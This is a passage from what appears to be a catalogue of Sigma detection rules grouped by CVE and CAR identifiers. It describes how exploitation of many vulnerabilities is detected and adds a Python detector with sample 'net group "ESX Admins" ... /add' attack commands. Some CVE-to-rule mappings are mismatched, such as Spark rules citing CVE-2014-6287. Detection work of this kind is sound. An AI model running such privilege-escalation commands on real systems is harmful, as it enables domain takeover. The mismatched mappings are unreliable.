    Description: Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287
cve.2022_33891 2
  • Apache Spark Shell Command Injection - ProcessCreation - Level: high
    Description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective
  • Apache Spark Shell Command Injection - Weblogs - Level: high
    Description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a weblogs perspective
car.2013_05_004 2
  • Remote Task Creation via ATSVC Named Pipe - Zeek - Level: medium
    Description: Detects remote task creation via at.exe or API interacting with the ATSVC named pipe
  • Remote Task Creation via ATSVC Named Pipe - Level: medium
    Description: Detects remote task creation via at.exe or API interacting with the ATSVC named pipe
car.2015_04_001 2
  • Remote Task Creation via ATSVC Named Pipe - Zeek - Level: medium
    Description: Detects remote task creation via at.exe or API interacting with the ATSVC named pipe
  • Remote Task Creation via ATSVC Named Pipe - Level: medium
    Description: Detects remote task creation via at.exe or API interacting with the ATSVC named pipe
cve.2021_42278 2
  • Win Susp Computer Name Containing Samtheadmin - Level: critical
    Description: Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool
  • Potential CVE-2021-42278 Exploitation Attempt - Level: medium
    Description: The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.
cve.2021_42287 2
  • Win Susp Computer Name Containing Samtheadmin - Level: critical
    Description: Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool
  • Suspicious Computer Account Name Change CVE-2021-42287 - Level: high
    Description: Detects the renaming of an existing computer account to an account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287
cve.2022_30190 2
  • File Creation In Suspicious Directory By Msdt.EXE - Level: high
    Description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
  • Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE - Level: high
    Description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library
car.2014_11_003 2
  • Sticky Key Like Backdoor Execution - Level: critical
    Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
  • Sticky Key Like Backdoor Usage - Registry - Level: critical
    Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
car.2014_11_008 2
  • Sticky Key Like Backdoor Execution - Level: critical
    Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
  • Sticky Key Like Backdoor Usage - Registry - Level: critical
    Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
cve.2022_41120 2
  • HackTool - SysmonEOP Execution - Level: critical
    Description: Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
  • Suspicious Sysmon as Execution Parent - Level: high
    Description: Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)
car.2013_05_002 2
  • Suspicious Binary In User Directory Spawned From Office Application - Level: high
    Description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
  • Suspicious Process Start Locations - Level: medium
    Description: Detects suspicious process run from unusual locations
cve.2021_35211 2
  • Suspicious Serv-U Process Pattern - Level: high
    Description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service
  • Serv-U Exploitation CVE-2021-35211 by DEV-0322 - Level: critical
    Description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
cve.2020_1472 2
  • Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC - Level: high
    Description: Detects the execution of the commonly used ZeroLogon PoC executable.
  • Potential Zerologon (CVE-2020-1472) Exploitation - Level: high
    Description: Detects potential Netlogon Elevation of Privilege Vulnerability aka Zerologon (CVE-2020-1472)
cve.2020_1048 2
  • Suspicious PrinterPorts Creation (CVE-2020-1048) - Level: high
    Description: Detects commands that add a new printer port which points to a suspicious file
  • CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry - Level: high
    Description: Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
cve.2021_33771 2
  • CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
  • CVE-2021-31979 CVE-2021-33771 Exploits - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
cve.2021_31979 2
  • CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
  • CVE-2021-31979 CVE-2021-33771 Exploits - Level: critical
    Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
cve.2021_21978 2
  • CVE-2021-21978 Exploitation Attempt - Level: high
    Description: Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978
  • Exploitation of CVE-2021-26814 in Wazuh - Level: high
    Description: Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814
cve.2021_26858 2
  • CVE-2021-26858 Exchange Exploitation - Level: high
    Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for creation of non-standard files on disk by Exchange Server’s Unified Messaging service which could indicate dropping web shells or other malicious content
  • ProxyLogon Reset Virtual Directories Based On IIS Log - Level: critical
    Description: When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories
cve.2021_40444 2
Show Rules (2)
  • Potential CVE-2021-40444 Exploitation Attempt - Level: high
    Description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns observed in in-the-wild exploitation
  • Potential Exploitation Attempt From Office Application - Level: high
    Description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)
cve.2021_40539 2
Show Rules (2)
  • ADSelfService Exploitation - Level: high
    Description: Detects suspicious access to URLs that were observed in cases in which attackers exploited the ADSelfService vulnerability CVE-2021-40539
  • CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit - Level: critical
    Description: Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).
cve.2021_44228 2
Show Rules (2)
  • Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon - Level: high
    Description: Detects potential initial exploitation attempts against VMware Horizon deployments running vulnerable versions of Log4j.
  • Log4j RCE CVE-2021-44228 in Fields - Level: high
    Description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
cve.2023_38331 2
Show Rules (2)
  • CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File - Level: high
    Description: Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331
  • CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process - Level: high
    Description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.
cve.2023_40477 2
Show Rules (2)
  • CVE-2023-40477 Potential Exploitation - .REV File Creation - Level: low
    Description: Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash.
  • CVE-2023-40477 Potential Exploitation - WinRAR Application Crash - Level: medium
    Description: Detects a crash of "WinRAR.exe" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477
cve.2023_43621 2
Show Rules (2)
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy - Level: high
    Description: Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in proxy logs.
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Web - Level: high
    Description: Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in access logs.
cve.2023_46214 2
Show Rules (2)
  • Potential CVE-2023-46214 Exploitation Attempt - Level: medium
    Description: Detects potential exploitation of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing
  • Exploitation Attempt Of CVE-2023-46214 Using Public POC Code - Level: high
    Description: Detects exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing using known public proof of concept code
cve.2023_46747 2
Show Rules (2)
  • CVE-2023-46747 Exploitation Activity - Proxy - Level: high
    Description: Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.
  • CVE-2023-46747 Exploitation Activity - Webserver - Level: high
    Description: Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.
cve.2024_1708 2
Show Rules (2)
  • CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Level: medium
    Description: This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.
  • CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security - Level: critical
    Description: This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. This requires an Advanced Auditing policy that logs successful Windows Event ID 4663 events, with a SACL set on the directory.
cve.2024_3400 2
Show Rules (2)
  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation - Level: medium
    Description: Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled. As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.
  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - Level: high
    Description: Detects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect. This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection.
cve.2024_37085 2
Show Rules (2)
  • Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group - Level: high
    Description: Detects execution of the "net.exe" command in order to add a group named "ESX Admins". This could indicate a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on a domain-joined ESXi hypervisor. VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
  • Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group Activity - Level: high
    Description: Detects any creation or modification of a Windows domain group with the name "ESX Admins". This could indicate a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on a domain-joined ESXi hypervisor. VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
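The two CVE-2024-37085 rules above look at different telemetry: the first at process creation (net.exe adding the group), the second at Active Directory group management events. The following is an added example, not code from the SigmaTACT report or the Sigma project, that expresses both checks as Python functions and runs them over constructed sample events. Field names follow Sysmon Event ID 1 / Security 4688 (Image, CommandLine) and the Windows Security group events 4727/4731/4754 (security-enabled group created) and 4735/4737/4755 (group changed) with TargetUserName; the whitespace- and case-insensitive group name match is this example's own assumption, not something the rules state.

```python
import re

# Process-creation side: net.exe or net1.exe (the latter is a common way to
# dodge naive "net.exe" matches) with "group ... ESX Admins ... /add".
# Creating the group and adding a member both use /add, so both are caught.
NET_IMAGES = ("\\net.exe", "\\net1.exe")
GROUP_ADD = re.compile(r'\bgroup\b.*"?ESX\s+Admins"?.*/add\b', re.IGNORECASE)


def is_esx_admins_net_group(event: dict) -> bool:
    image = event.get("Image", "").lower()
    if not image.endswith(NET_IMAGES):
        return False
    return GROUP_ADD.search(event.get("CommandLine", "")) is not None


# Security-log side: security-enabled group created (global/local/universal)
# or changed. This catches the same action done via ADUC or PowerShell,
# which the net.exe rule never sees.
GROUP_CREATED = {4727, 4731, 4754}
GROUP_CHANGED = {4735, 4737, 4755}


def normalize_group(name: str) -> str:
    """Collapse whitespace and case so 'esx  admins' still matches.
    Assumption of this example: AD group names compare case-insensitively."""
    return " ".join(name.split()).casefold()


def is_esx_admins_group_event(event: dict) -> bool:
    if event.get("EventID") not in GROUP_CREATED | GROUP_CHANGED:
        return False
    return normalize_group(event.get("TargetUserName", "")) == "esx admins"


def scan_process(events):
    """Indexes of process-creation events matching the net.exe rule."""
    return [i for i, ev in enumerate(events) if is_esx_admins_net_group(ev)]


def scan_security(events):
    """Indexes of Security events matching the group-management rule."""
    return [i for i, ev in enumerate(events) if is_esx_admins_group_event(ev)]


# Constructed sample events, not taken from a real host.
PROCESS_EVENTS = [
    {"Image": "C:\\Windows\\System32\\net.exe",
     "CommandLine": 'net group "ESX Admins" /add /domain'},
    {"Image": "C:\\Windows\\System32\\net1.exe",
     "CommandLine": 'C:\\Windows\\system32\\net1 group "ESX Admins" attacker /add /domain'},
    {"Image": "C:\\Windows\\System32\\net.exe",
     "CommandLine": "net user backup /add"},
]
SECURITY_EVENTS = [
    {"EventID": 4727, "TargetUserName": "ESX Admins", "SubjectUserName": "jdoe"},
    {"EventID": 4737, "TargetUserName": "esx  admins", "SubjectUserName": "jdoe"},
    {"EventID": 4727, "TargetUserName": "Backup Operators", "SubjectUserName": "jdoe"},
]

if __name__ == "__main__":
    print("process hits :", scan_process(PROCESS_EVENTS))
    print("security hits:", scan_security(SECURITY_EVENTS))
```

The Security-log check is the more robust of the two: it fires regardless of which tool created or modified the group, whereas the process-creation check only covers the net.exe LOLBin. Running both, as the two Sigma rules do, covers the case where an attacker avoids net.exe entirely.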
cve.2021.3156 2
Show Rules (2)
  • CVE-2021-3156 Exploitation Attempt - Level: high
    Description: Detects an exploitation attempt of the vulnerability described in CVE-2021-3156. An alternative approach is to look for flooding of auditd logs caused by the bruteforcing required to trigger the heap-based buffer overflow.
  • CVE-2021-3156 Exploitation Attempt Bruteforcing - Level: high
    Description: Detects an exploitation attempt of the vulnerability described in CVE-2021-3156 by looking for flooding of auditd logs caused by the bruteforcing required to trigger the heap-based buffer overflow.
car.2019_04_002 1
Show Rules (1)
  • Regsvr32 Anomaly - Level: high
    Description: Detects various anomalies in relation to regsvr32.exe
car.2019_04_003 1
Show Rules (1)
  • Regsvr32 Anomaly - Level: high
    Description: Detects various anomalies in relation to regsvr32.exe
cve.2017_5638 1
Show Rules (1)
  • Potential OGNL Injection Exploitation In JVM Based Application - Level: high
    Description: Detects potential OGNL Injection exploitation, which may lead to RCE. OGNL is an expression language that is supported in many JVM based systems. OGNL Injection is the root cause of some high profile RCEs such as Apache Struts (CVE-2017-5638) and Confluence (CVE-2022-26134)
cve.2021_1678 1
Show Rules (1)
  • Possible PrintNightmare Print Driver Install - Level: medium
    Description: Detects the remote installation of a print driver, which is a possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally or through group policy.
car.2016_04_005 1
Show Rules (1)
  • Admin User Remote Logon - Level: low
    Description: Detects remote logon by an Administrator user (depending on the internal account naming pattern).
stp.4u 1
Show Rules (1)
  • Potential Access Token Abuse - Level: medium
    Description: Detects potential token impersonation and theft, for example when "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" are used with the "LOGON32_LOGON_NEW_CREDENTIALS" flag.
cve.2021_21551 1
Show Rules (1)
  • PUA - Process Hacker Driver Load - Level: high
    Description: Detects driver load of the Process Hacker tool
cve.2021_36934 1
Show Rules (1)
  • HackTool - Typical HiveNightmare SAM File Export - Level: high
    Description: Detects files written by the different tools that exploit HiveNightmare
stp.1k 1
Show Rules (1)
  • CobaltStrike Named Pipe Patterns - Level: high
    Description: Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles
stp.2a 1
Show Rules (1)
  • Service Registry Permissions Weakness Check - Level: medium
    Description: Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in Registry key permissions to redirect from the originally specified executable to one that they control, in order to launch their own code at service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
cve.2023_21746 1
Show Rules (1)
  • HackTool - LocalPotato Execution - Level: high
    Description: Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples
car.2013_02_003 1
Show Rules (1)
  • Suspicious MSHTA Child Process - Level: high
    Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution
car.2013_03_001 1
Show Rules (1)
  • Suspicious MSHTA Child Process - Level: high
    Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution
car.2014_04_003 1
Show Rules (1)
  • Suspicious MSHTA Child Process - Level: high
    Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution
cve.2020_1599 1
Show Rules (1)
  • MSHTA Suspicious Execution 01 - Level: high
    Description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
car.2013_01_002 1
Show Rules (1)
  • Potential Persistence Via GlobalFlags - Level: high
    Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
cve.2014_6287 1
Show Rules (1)
  • Rejetto HTTP File Server RCE - Level: high
    Description: Detects attempts to exploit a Rejetto HTTP File Server (HFS) via CVE-2014-6287
cve.2010_5278 1
Show Rules (1)
  • CVE-2010-5278 Exploitation Attempt - Level: critical
    Description: MODx manager - Local File Inclusion: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
cve.2015_1641 1
Show Rules (1)
  • Exploit for CVE-2015-1641 - Level: critical
    Description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
cve.2017_0261 1
Show Rules (1)
  • Exploit for CVE-2017-0261 - Level: medium
    Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
cve.2017_11882 1
Show Rules (1)
  • Droppers Exploiting CVE-2017-11882 - Level: critical
    Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
cve.2017_8759 1
Show Rules (1)
  • Exploit for CVE-2017-8759 - Level: critical
    Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
cve.2018_13379 1
Show Rules (1)
  • Fortinet CVE-2018-13379 Exploitation - Level: critical
    Description: Detects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs
cve.2018_2894 1
Show Rules (1)
  • Oracle WebLogic Exploit - Level: critical
    Description: Detects access to a webshell dropped into a keystore folder on the WebLogic server
car.2013_10_002 1
Show Rules (1)
  • Sofacy Trojan Loader Activity - Level: high
    Description: Detects Trojan loader activity as used by APT28
cve.2019_11510 1
Show Rules (1)
  • Pulse Secure Attack CVE-2019-11510 - Level: critical
    Description: Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole
cve.2019_1378 1
Show Rules (1)
  • Exploiting SetupComplete.cmd CVE-2019-1378 - Level: high
    Description: Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378
cve.2019_19781 1
Show Rules (1)
  • Citrix Netscaler Attack CVE-2019-19781 - Level: critical
    Description: Detects CVE-2019-19781 exploitation attempts against Citrix Netscaler, Application Delivery Controller and Citrix Gateway
cve.2019_1388 1
Show Rules (1)
  • Exploiting CVE-2019-1388 - Level: critical
    Description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
cve.2019_3398 1
Show Rules (1)
  • Confluence Exploitation CVE-2019-3398 - Level: critical
    Description: Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398
cve.2020_10148 1
Show Rules (1)
  • CVE-2020-10148 SolarWinds Orion API Auth Bypass - Level: critical
    Description: Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts
cve.2020_1350 1
Show Rules (1)
  • DNS RCE CVE-2020-1350 - Level: critical
    Description: Detects exploitation of the DNS RCE bug reported in CVE-2020-1350 by detecting a suspicious sub process
cve.2020_5902 1
Show Rules (1)
  • CVE-2020-5902 F5 BIG-IP Exploitation Attempt - Level: critical
    Description: Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902
cve.2020_8193 1
Show Rules (1)
  • Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195 - Level: critical
    Description: Detects exploitation attempts against Citrix Netscaler, Application Delivery Controller (ADC) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195
cve.2020_8195 1
Show Rules (1)
  • Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195 - Level: critical
    Description: Detects exploitation attempts against Citrix Netscaler, Application Delivery Controller (ADC) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195
cve.2020_10189 1
Show Rules (1)
  • Exploited CVE-2020-10189 Zoho ManageEngine - Level: high
    Description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
cve.2020_28188 1
Show Rules (1)
  • TerraMaster TOS CVE-2020-28188 - Level: high
    Description: Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188
cve.2020_3452 1
Show Rules (1)
  • Cisco ASA FTD Exploit CVE-2020-3452 - Level: high
    Description: Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (successful exploitation)
cve.2020_14882 1
Show Rules (1)
  • Oracle WebLogic Exploit CVE-2020-14882 - Level: high
    Description: Detects exploitation attempts on WebLogic servers
cve.2021_20090 1
Show Rules (1)
  • Arcadyan Router Exploitations - Level: critical
    Description: Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.
cve.2021_20091 1
Show Rules (1)
  • Arcadyan Router Exploitations - Level: critical
    Description: Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.
cve.2021_2109 1
Show Rules (1)
  • Oracle WebLogic Exploit CVE-2021-2109 - Level: critical
    Description: Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109
cve.2021_21972 1
Show Rules (1)
  • CVE-2021-21972 VSphere Exploitation - Level: high
    Description: Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972
cve.2021_22005 1
Show Rules (1)
  • VMware vCenter Server File Upload CVE-2021-22005 - Level: high
    Description: Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.
cve.2021_22123 1
Show Rules (1)
  • Fortinet CVE-2021-22123 Exploitation - Level: critical
    Description: Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs
cve.2021_22893 1
Show Rules (1)
  • Pulse Connect Secure RCE Attack CVE-2021-22893 - Level: high
    Description: This rule detects exploitation attempts using the Pulse Connect Secure (PCS) vulnerability CVE-2021-22893
cve.2021_26814 1
Show Rules (1)
  • Exploitation of CVE-2021-26814 in Wazuh - Level: high
    Description: Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814
cve.2021_26857 1
Show Rules (1)
  • Potential CVE-2021-26857 Exploitation Attempt - Level: high
    Description: Detects possible successful exploitation of the vulnerability described in CVE-2021-26857 by looking for abnormal subprocesses spawned by Exchange Server's Unified Messaging service
cve.2021_27905 1
Show Rules (1)
  • Potential CVE-2021-27905 Exploitation Attempt - Level: medium
    Description: Detects exploitation attempt of the CVE-2021-27905 which affects all Apache Solr versions prior to and including 8.8.1.
cve.2021_28480 1
Show Rules (1)
  • Exchange Exploitation CVE-2021-28480 - Level: critical
    Description: Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480
cve.2021_33766 1
Show Rules (1)
  • CVE-2021-33766 Exchange ProxyToken Exploitation - Level: critical
    Description: Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766
cve.2021_41379 1
Show Rules (1)
  • Potential CVE-2021-41379 Exploitation Attempt - Level: critical
    Description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights
cve.2021_41773 1
Show Rules (1)
  • CVE-2021-41773 Exploitation Attempt - Level: high
    Description: Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
cve.2021_42237 1
Show Rules (1)
  • Sitecore Pre-Auth RCE CVE-2021-42237 - Level: high
    Description: Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx
cve.2021_43798 1
Show Rules (1)
  • Grafana Path Traversal Exploitation CVE-2021-43798 - Level: critical
    Description: Detects a successful Grafana path traversal exploitation
cve.2021_44077 1
Show Rules (1)
  • CVE-2021-44077 POC Default Dropped File - Level: high
    Description: Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)
cve.2023_21554 1
Show Rules (1)
  • Potential CVE-2023-21554 QueueJumper Exploitation - Level: high
    Description: Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)
cve.2022_21587 1
Show Rules (1)
  • Potential CVE-2022-21587 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts of CVE-2022-21587 an arbitrary file upload vulnerability impacting Oracle E-Business Suite (EBS). CVE-2022-21587 can lead to unauthenticated remote code execution.
cve.2022_22954 1
Show Rules (1)
  • Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution - Level: medium
    Description: Detects potential exploitation attempts of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, as part of the attack chain threat actors used PowerShell commands that executed as child processes of the legitimate Tomcat "prunsrv.exe" process.
cve.2022_24527 1
Show Rules (1)
  • CVE-2022-24527 Microsoft Connected Cache LPE - Level: high
    Description: Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache
cve.2022_26809 1
Show Rules (1)
  • Potential CVE-2022-26809 Exploitation Attempt - Level: high
    Description: Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)
cve.2022_27925 1
Show Rules (1)
  • Zimbra Collaboration Suite Email Server Unauthenticated RCE - Level: medium
    Description: Detects an attempt to leverage the vulnerable servlet "mboximport" for an unauthenticated remote command injection
cve.2022_29072 1
Show Rules (1)
  • Potential CVE-2022-29072 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process.
cve.2022_31659 1
Show Rules (1)
  • CVE-2022-31659 VMware Workspace ONE Access RCE - Level: medium
    Description: Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659
cve.2022_31656 1
Show Rules (1)
  • CVE-2022-31656 VMware Workspace ONE Access Auth Bypass - Level: high
    Description: Detects the exploitation of the VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656. VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.
cve.2022_36804 1
Show Rules (1)
  • Atlassian Bitbucket Command Injection Via Archive API - Level: high
    Description: Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804
cve.2022_42475 1
Show Rules (1)
  • Exploitation Indicator Of CVE-2022-42475 - Level: high
    Description: Detects exploitation indicators of CVE-2022-42475 a heap-based buffer overflow in sslvpnd.
cve.2022_44877 1
Show Rules (1)
  • Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877 - Level: high
    Description: Detects potential exploitation attempts that target the Centos Web Panel 7 Unauthenticated Remote Code Execution CVE-2022-44877
cve.2022_46169 1
Show Rules (1)
  • Potential CVE-2022-46169 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169
cve.2023_1389 1
Show Rules (1)
  • CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21 - Level: medium
    Description: Detects potential exploitation attempt of CVE-2023-1389 an Unauthenticated Command Injection in TP-Link Archer AX21.
cve.2023_2283 1
Show Rules (1)
  • Potential CVE-2023-2283 Exploitation - Level: medium
    Description: Detects potential exploitation attempts of CVE-2023-2283, an authentication bypass in libssh. The exploitation method causes an error message stating that keys for curve25519 could not be generated. That error message is a sign of an exploitation attempt, not of successful exploitation.
cve.2023_23752 1
Show Rules (1)
  • Potential CVE-2023-23752 Exploitation Attempt - Level: high
    Description: Detects potential exploitation attempts of CVE-2023-23752, an improper access check in web service endpoints in Joomla
cve.2023_25157 1
Show Rules (1)
